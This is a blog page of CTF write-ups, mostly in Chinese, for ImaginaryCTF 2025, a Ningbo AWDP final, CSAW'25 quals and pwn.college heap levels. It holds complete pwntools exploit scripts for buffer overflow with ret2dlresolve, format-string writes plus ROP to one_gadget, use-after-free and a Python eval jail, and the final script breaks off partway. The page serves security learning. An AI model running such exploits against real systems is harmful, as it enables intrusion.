Exploit 3

TODO

Write-ups: ImaginaryCTF 2025

Fri, 19 Sep 2025 00:00:00 GMT

cascade

Information

Category: Pwn
Difficulty: Medium
Points: 292

Description

just a buffer overflow, right?

Write-up

64 字节的缓冲区，512 字节的输入，Partial RELRO，没 gadgets，没 libc……当时想到的就是打 ret2dlresolve，解析 system，最后虽然我成功带着参数进入了 system，并且执行 system 的过程中没有出现问题，但是却并没有得到 shell 。很费解，只记得当时调试到凌晨三点都没找到问题，可惜我已经把之前的 exp 删掉了……

后来看了下官方的 wp，也是 ret2dlresolve，并且和我一样都是用 pwntools 直接生成的 fake structures，甚至都是解析的 system，唯一的区别是我当时直接把 system 的参数也写到结构体里面了，当时也没搞明白是为啥，明明没有 rdi gadget 的，但它却可以自动设置一个参数，我也没用 rop 功能，就是手动调用。而官方 wp 是手动设置的参数。当时我并没有找到手动设置参数的方法……复现的时候才发现，原来那么简单。

其实我复现官方 wp 的时候，发现本地也还是打不通，虽然也成功执行了 system，不禁让我怀疑我当时是不是只要远程测试一下说不定就通了，我艹哦，感觉损失了一个亿，好难过……

ropper 发现，程序并没有控制参数的 gadgets，所以我们就算能解析出来 system 的地址也没用，还得想办法给它传参。

这好办，注意到 main 函数调用了两个 setvbuf，它们第一个参数都来自 bss 段：

; Attributes: bp-based frame

; int __fastcall main(int argc, const char **argv, const char **envp)
public main
main proc near
; __unwind {
endbr64
push    rbp
mov     rbp, rsp
mov     rax, cs:stdout@GLIBC_2_2_5
mov     ecx, 0          ; n
mov     edx, 2          ; modes
mov     esi, 0          ; buf
mov     rdi, rax        ; stream
call    _setvbuf
mov     rax, cs:stdin@GLIBC_2_2_5
mov     ecx, 0          ; n
mov     edx, 2          ; modes
mov     esi, 0          ; buf
mov     rdi, rax        ; stream
call    _setvbuf
mov     eax, 0
call    vuln
mov     eax, 0
pop     rbp
retn
; } // starts at 40117B
main endp

_text ends

那我们只要能控制 bss 中 stdin 或者 stdout 的值就能控制 rdi 了。好巧不巧，没开 PIE，~这就是隐藏的人和产生的地利。~

接着思考应该让 ret2dlresolve 修改哪个 got 项呢？观察下面的 main 函数反编译代码，我们看到最开始调用了两个 setvbuf 。结合上面设置参数的方法，如果我们让 dlresolve 将解析出来的 system 地址写入 setvbuf 的 got 项，那我们只要返回到 main 就可以再次调用 setvbuf，而调用 setvbuf 会先设置参数，然后调用 system 。

策略就是这样，还是很简单的。

int __fastcall main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  vuln();
  return 0;
}

:::important 下面这个 payload 需要注意的地方是，data_addr 的地址我们可以在将 dlresolve payload 读进去之后动调确定，然后第二次 read 读入的 RBP 一定要设置的大点，不然后面在执行 dlresolve 解析的时候那些函数的 prologues 会将 RSP 缩小到只读地址，就会导致非法访问从而 abort 。 :::

~PS: 有关这道题其实还有一个小故事（为期差不多三周的小故事还能算小嘛？我不知道……），算了太晚了，不写了……总之，让我越发意识到自己眼睛问题的严重程度 :sob:~

Exploit

#!/usr/bin/env python3

from pwn import (
    ROP,
    Ret2dlresolvePayload,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./vuln"
HOST, PORT = "cascade.chal.imaginaryctf.org", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    read = 0x401162
    dlresolve = Ret2dlresolvePayload(
        elf=elf,
        symbol="system",
        args=[],
        data_addr=0x404070,
        resolution_addr=elf.got["setvbuf"],
    )
    payload = flat(
        b"A" * 64,
        elf.sym["stdout"] + 0x40,
        read,
    ).ljust(0x200 - 1, b"\x00")

    raw_input("DEBUG")
    target.sendline(payload)

    rop.ret2dlresolve(dlresolve)
    rop.raw(rop.ret)
    rop.main()
    target.success(rop.dump())

    payload = flat(
        elf.sym["stdout"] + 0x8,  # /bin/sh address
        b"/bin/sh\x00",
        b"A" * 0x30,
        0x404F40,  # rbp
        read,
        dlresolve.payload,
    ).ljust(0x200 - 1, b"\x00")
    target.sendline(payload)

    payload = flat(
        b"A" * 0x40,
        b"B" * 0x8,  # rbp
        rop.chain(),
    ).ljust(0x200 - 1, b"\x00")
    target.sendline(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[ictf{i_h0pe_y0u_didnt_use_ret2dl_94b51175}]

Write-ups: 2025 宁波市第八届网络安全大赛决赛

Wed, 17 Sep 2025 00:00:00 GMT

Cake_shop

Information

Category: AWDP Pwn
Points: Unknown

Description

Unknown

Write-up

Kong 师傅分享的题，本来只是抱着试一试的心态，看看能不能做出来的，结果没想到还真做出来了……决赛题，不过感觉挺简单，如果我在现场的话就拿分了哈哈哈，可惜了，国内赛事接触太少了。Anyway，还是值得记录一下的。

粗略分析一下，发现 do_nothing 里面存在格式化字符串漏洞。由于主菜单无限循环，所以我们可以无限触发格式化字符串漏洞，感觉这样一来题目难度瞬间就低了好几个档次。

int do_nothing()
{
  char buf[40]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts(s);
  puts("\x1B[33mMaybe it should be thought about in your head\x1B[0m");
  puts("\x1B[33mWhat if it happens\x1B[0m");
  read(0, buf, 0x28u);
  return printf(buf);
}

chat 和 earn_money 功能没啥用，直接看 buy：

__int64 buy()
{
  int choice; // [rsp+8h] [rbp-38h] BYREF
  int money; // [rsp+Ch] [rbp-34h]
  _BYTE buf[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v4; // [rsp+38h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  puts(s);
  puts("\x1B[33mWe have three kinds of cakes here\x1B[0m");
  puts("\x1B[33m1.Strawberry cake $10\x1B[0m");
  puts("\x1B[33m2.Orange cake $50\x1B[0m");
  puts("\x1B[33m3.Watermelon cake $100\x1B[0m");
  __isoc99_scanf("%d", &choice);
  if ( choice == 1 )
  {
    money -= 10;
    money = money;
    if ( money < 0 )
      puts("\x1B[33mYou don't have enough money\x1B[0m");
  }
  if ( choice == 2 )
  {
    money -= 50;
    money = money;
    if ( money < 0 )
      puts("\x1B[33mYou don't have enough money\x1B[0m");
  }
  if ( choice == 3 )
  {
    money -= 100;
    money = money;
    if ( money < 0 )
      puts("\x1B[33mYou don't have enough money\x1B[0m");
  }
  if ( choice != 666 || money != 99999999 )
    return 0;
  puts("\x1B[33mBuy the whole cake shop\x1B[0m");
  read(0, buf, (unsigned int)size);
  return 0;
}

标绿的部分正常情况下是执行不到的，注意到后面还有个 read 函数，感觉有猫腻。因为有格式化字符串漏洞，我们可以先把程序的几个关键基址算出来，然后再思考如何绕过检测，执行到最后那个 read 函数。

这里 choice 我们可以直接传入 666，所以问题就是 money 怎么赋值了。注意到 money 在 data 段，rw-p 权限，可篡改。

算了下，格式化字符串得写四字节，值是 0x5f5e0ff。由于只有几千万字节大小，写起来不会花多久，所以我一开始做的时候是选择一次性写完的，但听 Kong 师傅说他一次性写完有问题，于是我就改成一次写两字节了。

最后那个 read 将输入读到四十字节的 buffer 中，但是默认 size 只有 32 字节。不过由于 size 也保存在 data 段，所以我们同理可以利用 do_nothing 的格式化字符串改写 size，溢出返回地址。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./pwn_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("./libc.so.6")


def buy(choice):
    target.sendlineafter(b"Please make your choice>>", str(1).encode())
    target.sendlineafter(b"$100", str(choice).encode())


def do_nothing(msg):
    target.sendlineafter(b"Please make your choice>>", str(4).encode())
    target.sendlineafter(b"What if it happens", msg)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = b"%17$p %8$p"
    do_nothing(payload)
    target.recvline()
    response = target.recvline().strip().split()
    libc.address = int(response[0], 16) - 0x24083
    pie = int(response[1], 16) - 0x1570

    payload = b"%11$p"
    do_nothing(payload)
    target.recvline()
    canary = int(target.recvline().strip(), 16)
    money_p1 = pie + 0x4010
    money_p2 = money_p1 + 2
    money_value_p1 = 0x5F5E0FF & 0xFFFF
    money_value_p2 = (0x5F5E0FF >> 16) & 0xFFFF
    read_size = pie + 0x4014
    one_gadget = libc.address + 0xE3AFE

    target.success(f"libc: {hex(libc.address)}")
    target.success(f"pie: {hex(pie)}")
    target.success(f"canary: {hex(canary)}")
    target.success(f"money: {hex(money_p1)}")
    target.success(f"read_size: {hex(read_size)}")
    target.success(f"one_gadget: {hex(one_gadget)}")

    payload = flat(
        f"aaaa%{money_value_p1 - 0x4}c%8$hn".encode(),
        money_p1,
    )
    do_nothing(payload)

    payload = flat(
        f"aaaaa%{money_value_p2 - 0x5}c%8$hn".encode(),
        money_p2,
    )
    do_nothing(payload)

    payload = flat(
        b"aaaaaa%1337c%8$n",
        read_size,
    )
    do_nothing(payload)
    buy(666)

    # 0x00000000000015cc: pop r12; pop r13; pop r14; pop r15; ret;
    payload = flat(
        b"A" * 0x28,
        canary,
        b"A" * 0x8,
        pie + 0x00000000000015CC,
        0,
        0,
        0,
        0,
        one_gadget,
    )
    target.sendline(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Patch

直接把 printf patch 成 puts 就好了，ez

int do_nothing()
{
  char buf[40]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 v2; // [rsp+28h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts(s);
  puts("\x1B[33mMaybe it should be thought about in your head\x1B[0m");
  puts("\x1B[33mWhat if it happens\x1B[0m");
  read(0, buf, 0x28u);
  return puts(buf);
}

Write-ups: CSAW'25 CTF Qualification Round

Sat, 13 Sep 2025 00:00:00 GMT

Discord

Information

Category: Misc
Points: 10

Description

Join the Discord for our super secret flag!

Write-up

本来以为是和机器人聊天，发现这机器人还挺难斥候，怀疑是真人。但凡我表现出任何索要 flag 的姿态他就不高兴了……最后发现 flag 在 #rules channel，严重怀疑是不是自己眼睛瞎了，还是当时脑子没完全开机，居然跑去和机器人聊天，然后这机器人也是牛逼，我说我要睡觉了，人家第二天晚上还主动来找我，问我醒了没，继续聊啊……

Flag

:spoiler[csawctf{w3Ic0m3_70_th3_22nd_y34r_0f_CSAW}]

Star Scream (Old)

Information

Category: OSINT
Points: 50

Description

In 2017, a daring trio of tinkerers sent five midnight-black specks skyward. No bigger than loaves of bread, yet destined to circle Earth 400km above the clouds. Two of the tinkerers dreamt of showing their country's flags to the stars, but six weeks before my planned farewell, I tumbled back to the blue. Who am I?

When you've sleuthed out the answer, submit: csawctf{Satelite-name_satcatnumber}

Write-up

13 号的题，没想到出现了一些戏剧性的事情，比赛延期 24h 并修改了题目……懒得删了，记录一下这个旧 flag……

14 号的新题没做出来……/抓狂

References

Flag

:spoiler[csawctf{GhanaSat-1_42821}]

Mooneys Bookstore

Information

Category: Pwn
Points: 500

Description

You think it's just input. Just another binary. But this stack? It's mine. Overflow it. Follow the trail. I left a key behind. If you're paying attention, you'll find it. Slip once, and the story ends before it begins.

Write-up

简单题……我好菜啊 :sob:

Exploit

#!/usr/bin/env python3

from pwn import (
    ROP,
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)

FILE = "./overflow_me"
HOST, PORT = "chals.ctf.csaw.io", 21006

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    secret_addr = elf.bss() + 0x28
    target.success(f"secret addr: {hex(secret_addr)}")

    target.sendafter(b"Tell me its address", p64(secret_addr))
    leak = target.recvlines(2)[1]
    secret = int(leak, 16).to_bytes(0x8, "little")
    target.success(f"leaked_addr: 0x{secret.hex()}")
    target.sendafter(b"the story unlocks", secret)

    target.recvuntil(b"for you: ")
    val = int(target.recvline().strip(), 16).to_bytes(0x8, "little")
    target.success(f"val: 0x{val.hex()}")

    # raw_input("DEBUG")
    payload = flat(
        b"A" * 64,
        val,
        b"A" * 0x10,
        rop.ret.address,
        elf.sym["get_flag"],
    )
    target.sendlineafter(b"into this story.", payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[csawctf{U_w3r3_n3v3r_m3@nt_2_s33_th3_st@ck~but_I_l3t_U_1n_b3c@us3_1_l0v3_U~d8K#xY_q1W9eVz2NpL7}]

Power Up

Information

Category: Pwn
Points: 500

Description

Your starship have been wandering for weeks in this derelict orbit, whose core is out of energy. You are the last engineer who must ignite the core with energy using proper modules. Power up the starship. Or stay stranded forever.

Write-up

复现一下，比赛的时候成功解决了里面的伪随机数问题，但是由于没怎么学过堆方面的知识，导致我认为这是 unsorted bin attack，然后现场学习了一番，发现始终会遇到问题，最后也没能做出来就放弃了……

但是很意外，赛后看见有人通过逆向分析就给出了非预期的最简单解法……草，最近很多题目都向我指出：我要是不急着想怎么利用，而是多思考思考伪代码和汇编的话，说不定会有奇迹……

Anyway，这道题官方解法是 largebin attack，草，我当时完全跑偏了。问题不大，先复现一下逆向分析的解法，然后等以后学完 largebin 了再回头用预期解做这道题吧……

逐个功能进去查看，发现 launch_starship 会直接打开并输出 flag 的内容：

unsigned __int64 launch_starship()
{
  size_t n; // rax
  int fd; // [rsp+Ch] [rbp-94h]
  char s[136]; // [rsp+10h] [rbp-90h] BYREF
  unsigned __int64 v4; // [rsp+98h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(s, 0, 0x80u);
  fd = open("flag.txt", 0);
  if ( fd == -1 )
  {
    fwrite("Error: open failed\n", 1u, 0x13u, stderr);
    exit(1);
  }
  read(fd, s, 0x80u);
  close(fd);
  *(_WORD *)&s[strlen(s)] = 10;
  n = strlen(s);
  write(1, s, n);
  return v4 - __readfsqword(0x28u);
}

下面是 main 函数：

int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int seed; // eax
  int v4; // eax
  int n5; // [rsp+Ch] [rbp-14h] BYREF
  unsigned int v7; // [rsp+10h] [rbp-10h]
  int char; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v9; // [rsp+18h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  puts("Your starship have been wandering for weeks in this derelict orbit, whose core is out of energy.");
  puts("You are the last engineer who must ignite the core with energy using proper modules.");
  puts("Power up the starship. Or stay stranded forever.");
  seed = time(0);
  srand(seed);
  while ( 1 )
  {
    while ( 1 )
    {
      putchar(10);
      puts("[1] Create a module");
      puts("[2] Delete a module");
      puts("[3] Edit a module");
      puts("[4] Power up");
      puts("[5] Stay stranded");
      printf(">> ");
      if ( (unsigned int)__isoc99_scanf("%d", &n5) == 1 && n5 > 0 && n5 <= 5 )
        break;
      puts("Invalid choice!");
      do
        char = getchar();
      while ( char != 10 && char != -1 );
    }
    v4 = rand();
    v7 = (unsigned __int8)(((unsigned int)(v4 >> 31) >> 24) + v4) - ((unsigned int)(v4 >> 31) >> 24);
    switch ( n5 )
    {
      case 1:
        create_module();
        break;
      case 2:
        delete_module();
        break;
      case 3:
        edit_module();
        break;
      case 4:
        if ( (unsigned __int8)(16 * BYTE1(energy)) | (unsigned __int64)(((energy >> 4) & 0xF) == v7) )
        {
          puts("The core is full of energy to power up the starship!");
          launch_starship();
          exit(0);
        }
        puts("The core is still dead as a rock without energy!");
        break;
      case 5:
        puts("You and your starship will stay stranded in deep space forever!");
        exit(1);
      default:
        continue;
    }
  }
}

这里直接手撕……注意到 v4 是通过 rand 生成的伪随机数，这个函数返回值范围是 $[ 0,RAND_MAX]$ 。

而 v7 这个表达式，(unsigned __int8)(((unsigned int)(v4 >> 31) >> 24) + v4) - ((unsigned int)(v4 >> 31) >> 24)，我们也无需深究它到底是什么意思，因为并不复杂，直接消项嘛～发现有两部分相同的是 (unsigned int)(v4 >> 31) >> 24)，而减号左边比右边只是多加了一个 v4 罢了。那如果我们得到的 v4 正好为 0 的话，整个 v7 表达式的结果也会是 0，都用不着算的，真瞪眼法秒了……

现在再看 4 号功能的检测要求：(unsigned __int8)(16 * BYTE1(energy)) | (unsigned __int64)(((energy >> 4) & 0xF) == v7)，因为我们要是能 bypass 的话就能直接拿到 flag，那就想想有没有可能直接 bypass，这样我们就不用思考如何利用复杂的堆攻击了。

因为 energy 是在 bss 上的未初始化全局变量，默认为 0，所以 (unsigned __int8)(16 * BYTE1(energy)) 的值可以直接确定为 0。由于这里使用的是 | 逻辑与运算，相当于一个并集操作，所以如果我们想 bypass 这个检测，那唯一的机会就在 rhs 能不能是非 0 值了。

思考 rhs，(unsigned __int64)(((energy >> 4) & 0xF) == v7，它将 energy 值右移 4 bits，然后保留最低 4 bits，判断它与 v7 是否相等。相等就返回 1，否则返回 0 。

由于 energy 不论如何操作都是 0，这是肯定的，那只要 v7 也为 0，0 == 0，rhs 就返回 1，0 | 1 就等于 1，成功 bypass 。

而这，也只需要我们不断输入 4 选项罢了……至于能不能命中，只是个概率问题。

这里解法是 yes 4 | ./vuln，说实话当时看到这个答案还是有点惊讶的，后来想想，确实，自己的进步空间还是太大了……

Exploit

yes 4 | ./vuln

Flag

:spoiler[csawctf{tyjroj_71m3_7o_g0_h0m3_zoqSy9_5w337_h0m3_nywcyp}]

Obligatory RSA

Information

Category: Crypto
Points: 500

Description

Crypto just wouldn't be crypto without one!

Write-up

RSA 简单啊，~直接拷打 AI xD~

Exploit

#!/usr/bin/env python3

import math

from Crypto.Util.number import inverse, long_to_bytes

e = 65537
n1 = 129092526753383933030272290277107300767707654330551632967994396398045326531320303963182497488182474202461120692162734880438261410066549845639992024037416720228421076282632904598519793243067220342037144864237020757818263128301138206081187472003821789897063195512919097350247829148288118913456964033001399074373
n2 = 108355113470836594630192960651980673780103497896732213011958303033575870030505528169174729530490405910634291415346360688290452976527316909469646908289732023715737439312572012648165819533234604850608390233938174081867146846639110685928136323983961395098632140681799175543046722931901766226759894951292033805879
d1 = 88843495989869871001559754882918076779858404440780391818567639602073173623287821751315349650577023725245222074965050035045516207303078461168168819365025746973589245131570143944718203046457391270418459087764266630890566079039821735168805805866019315142070438225092171304343352469029480503113942986147848666077
d2 = 94565144275929764017241865812435668644218918537941567711225644474418458115544003036362558987818610553975855551983688286593672386482543188020042082319191545660551324293738920214028045344249670512999137548994496577128446165632885775744795722253354007167294035878656056258332703809173397147948143695113558988035


def solve():
    print("--- Starting Common Factor Attack ---")
    p = math.gcd(n1, n2)

    if p > 1:
        print("[+] Success! A common factor was found.")
        print("Shared Prime (p): {p}\n")

        q1 = n1 // p
        q2 = n2 // p

        print("--- Factoring Results ---")
        print("q1: {q1}")
        print("q2: {q2}")
        print("[+] Verification successful: p * q1 == n1 and p * q2 == n2\n")

        # Calculate Euler's totient function
        phi1 = (p - 1) * (q1 - 1)
        phi2 = (p - 1) * (q2 - 1)

        # Calculate the correct private keys
        d_correct_1 = inverse(e, phi1)
        d_correct_2 = inverse(e, phi2)
        print("--- Calculated Correct Private Keys ---")
        print(f"d_correct_1: {d_correct_1}")
        print(f"d_correct_2: {d_correct_2}\n")

        print("--- Decrypting given 'd' values as ciphertext ---")

        try:
            plaintext_1 = pow(d1, d_correct_1, n1)
            flag_1 = long_to_bytes(plaintext_1)
            print(f"[+] Decrypted plaintext from d1: {flag_1}")
        except Exception as ex:
            print(f"[-] Decryption failed for d1: {ex}")

        try:
            plaintext_2 = pow(d2, d_correct_2, n2)
            flag_2 = long_to_bytes(plaintext_2)
            print(f"[+] Decrypted plaintext from d2: {flag_2}")
        except Exception as ex:
            print(f"[-] Decryption failed for d2: {ex}")

    else:
        print("[-] Attack failed. n1 and n2 do not share a common factor.")


solve()

Flag

:spoiler[csawctf{wH04m1_70d3Ny_7r4D1710n_4820391578649021735}]

Galaxy

Information

Category: Misc
Points: 500

Description

Reach for the stars!

Write-up

调教 AI 出的……工具就应该拿来用不是吗 LOL

Exploit

#!/usr/bin/env python3

from pwn import context, process, remote, args
import sys

FILE = "./main.py"
HOST, PORT = "chals.ctf.csaw.io", 21009

context(log_level="debug")

alphabet = "abcdefghijklmnopqrstuvwxyz'"


def launch():
    global target
    if args.L:
        target = process(["python3", FILE])
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    def send_recv_str(payload):
        target.recvuntil(b"> ", timeout=1)
        target.sendline(payload.encode())
        try:
            line = target.recvline()
            if not line:
                return ""
            return line.decode(errors="ignore").strip()
        except Exception:
            return ""

    target.recvuntil(b"> ")

    apost_cipher = None
    for c in alphabet:
        # if ciphertext c -> "'", then c + "[" + c becomes "'['" after unwarp, eval("'['") -> prints [
        resp = send_recv_str(c + "[" + c)
        if resp and "[" in resp and resp != "no galaxy":
            apost_cipher = c
            target.info(
                f"Found apostrophe ciphertext: {apost_cipher!r} (response={resp!r})"
            )
            break

    if not apost_cipher:
        target.failure("Could not find apostrophe ciphertext. Abort.")
        target.close()
        sys.exit(1)

    # build cipher -> plaintext mapping by probing apost_cipher + candidate + apost_cipher
    cipher_to_plain = {}
    for c in alphabet:
        resp = send_recv_str(apost_cipher + c + apost_cipher)
        # on success resp is printed plaintext character (single char)
        if resp and resp != "no galaxy":
            cipher_to_plain[c] = resp[0]
            target.debug(f"cipher {c!r} -> plain {cipher_to_plain[c]!r}")
        else:
            cipher_to_plain[c] = None

    # the candidate that maps to "'" will have produced no valid eval (None).
    # fill it explicitly using apost_cipher we discovered.
    cipher_to_plain[apost_cipher] = "'"
    target.info(f'Explicitly set cipher {apost_cipher!r} -> plain "\'"')

    # invert mapping to get plaintext -> ciphertext
    plain_to_cipher = {}
    for c, pch in cipher_to_plain.items():
        if pch is not None:
            # if multiple c map to same pch (shouldn't), last one wins — but mapping is bijection here
            plain_to_cipher[pch] = c

    # sanity check
    missing = [ch for ch in alphabet if ch not in plain_to_cipher]
    if missing:
        target.warning(f"Missing plaintext->cipher mappings for: {missing}")
    else:
        target.info("Recovered full plaintext->cipher mapping for a-z and apostrophe.")

    # helper to encrypt plaintext expression using mapping
    def encrypt_plaintext(expr):
        out = []
        for ch in expr:
            if ch in plain_to_cipher:
                out.append(plain_to_cipher[ch])
            else:
                out.append(ch)
        return "".join(out)

    # negative index expression using allowed chars only
    def neg_expr(n):
        """
        Build an expression that evaluates to -n using only allowed characters.
        Use ~('a'<'b') == -2 and ~('a'<'a') == -1, combine with +.
        """
        q = n // 2
        r = n % 2
        parts = ["~('a'<'b')" for _ in range(q)]
        if r:
            parts.append("~('a'<'a')")
        return "+".join(parts)

    # ensure we can encrypt 'spiral' (all letters present)
    for ch in "spiral":
        if ch not in plain_to_cipher:
            target.failure(f"Missing mapping for letter {ch!r}. Aborting.")
            target.close()
            sys.exit(1)
    enc_spiral = encrypt_plaintext("spiral")
    target.info(f"Encrypted 'spiral' -> {enc_spiral!r}")

    # dump characters one-by-one using negative indices
    flag_chars = []
    MAX_CHARS = 80
    for i in range(1, MAX_CHARS + 1):
        idx_plain = neg_expr(i)
        expr_plain = f"spiral[{idx_plain}]"
        expr_cipher = encrypt_plaintext(expr_plain)
        resp = send_recv_str(expr_cipher)
        if not resp or resp == "no galaxy":
            target.info(f"Index -{i} out-of-range or eval error (resp={resp!r}), stop.")
            break
        ch = resp[0]
        target.info(f"got index -{i}: {repr(ch)}")
        flag_chars.append(ch)

    flag = "".join(reversed(flag_chars))
    target.success(f"Recovered flag (partial/full): {flag}")

    target.close()


if __name__ == "__main__":
    main()

Flag

:spoiler[csawctf{g@l@xy_0bserv3r$}]

Write-ups: Program Security (Dynamic Allocator Misuse) series (Completed)

Mon, 08 Sep 2025 00:00:00 GMT

前言

悲，这篇博客最早是在 2025-01-25 开始写的，那会儿刚准备开始学堆，结果却因为各种各样的原因（主要是未来路线规划和刚接触堆面对各种陌生的新知识感觉十分害怕，也确实不懂，觉得很难），就去干别的了。没想到一直到 25 年 9 月才重新开始写这篇博客……既然如此，那就干脆把以前写的全删了，从头开始刷这章好了……

其实发现以前写的多少有点小问题，虽然现在我会的也只是比一开始的时候多了那么一丢丢，只是粗略了解了一点 glibc 堆分配机制而已。总的来说，面对这一章我本质上还是从零开始，差不多吧……

Level 1.0

Information

Category: Pwn

Description

Exploit a use-after-free vulnerability to get the flag.

Write-up

我就不贴反编译代码了，感觉也没啥好贴的。主要还是说说思路吧：

read_flag 会 malloc 330 字节空间，然后将 flag 读到 malloc 返回的地址中。

puts 会输出全局变量 ptr 中的内容，也就是说我们只要想办法让 read_flag 的 malloc 返回的地址与 ptr 保存的地址相同，就可以通过 puts 输出 flag 的内容。

因为 glibc 堆分配器会从 bins 中寻找并复用大小近似的 free chunk，所以我们可以先通过调用 malloc 分配一块 330 字节的空间，然后 free 掉。这样下次如果还 malloc 330 字节大小的空间就会复用我们第一次 malloc 330 返回的地址。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    log,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level1.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Size: ", str(size))


def free():
    target.sendlineafter(b": ", b"free")


def puts():
    target.sendlineafter(b": ", b"puts")


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    malloc(330)
    free()
    read_flag()
    puts()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{8_UCfYUIGnvHU86NU1Qe-H6dK1o.0VM3MDL5cTNxgzW}]

Level 1.1

Information

Category: Pwn

Description

Exploit a use-after-free vulnerability to get the flag.

Write-up

参见 Level 1.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    log,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level1.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Size: ", str(size))


def free():
    target.sendlineafter(b": ", b"free")


def puts():
    target.sendlineafter(b": ", b"puts")


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    malloc(618)
    free()
    read_flag()
    puts()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{8oPO3KqdZU5lZfzl5xftjR2IZif.0lM3MDL5cTNxgzW}]

Level 2.0

Information

Category: Pwn

Description

Create and exploit a use-after-free vulnerability to get the flag.

Write-up

与 Level 1 区别不大。但是在 malloc 存放 flag 的空间时使用的是 rand() % 872 + 128，这会生成 $[ 0+128,872+128)$ 范围内的随机数。所以我们要么预测它生成什么随机数，要么爆破它落在哪个 bin 中。

rand 生成的是伪随机数，可以预测。本来想直接 break PRNG 的：上帝掷骰子？不，其实是线性同余。

但是后来发现程序在 __libc_csu_init 中调用了 flag_seed，而这个函数内部又调用了 srand(seed)，它的 seed 是循环异或栈上的数据得来的。虽然在每台机器上运行都会有特定的栈上的数据，但是并不是一个普适的方法，尽管我可以 debug 得到 seed，但是远程就打不通了。所以我们还是用爆破 bins 的方法好了。tcache bins 有限，这个 rand 生成的范围也不是很大，所以还是很容易爆破的。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    log,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level2.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Size: ", str(size))


def free():
    target.sendlineafter(b": ", b"free")


def puts():
    target.sendlineafter(b": ", b"puts")


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def test_size(candidate):
    launch()
    malloc(candidate)
    free()
    read_flag()
    puts()

    response = target.recvall(timeout=0.01)
    if b"pwn.college{" in response:
        target.close()
        return True
    return False


def main():
    for bin in range(0x20, 0x410 + 1, 0x10):
        base_req = bin - 0x10
        ok = test_size(base_req)
        if ok:
            log.success(
                f"Found working requested size: {hex(base_req)} for tcache bin {hex(bin)}"
            )
            return
        log.warning("Exhausted candidates, none matched.")
    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{ME7LG_Jy8T-xEw9H_njxpD2aJ4z.01M3MDL5cTNxgzW}]

Level 2.1

Information

Category: Pwn

Description

Create and exploit a use-after-free vulnerability to get the flag.

Write-up

参见 Level 2.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    log,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level2.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Size: ", str(size))


def free():
    target.sendlineafter(b": ", b"free")


def puts():
    target.sendlineafter(b": ", b"puts")


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def test_size(candidate):
    launch()
    malloc(candidate)
    free()
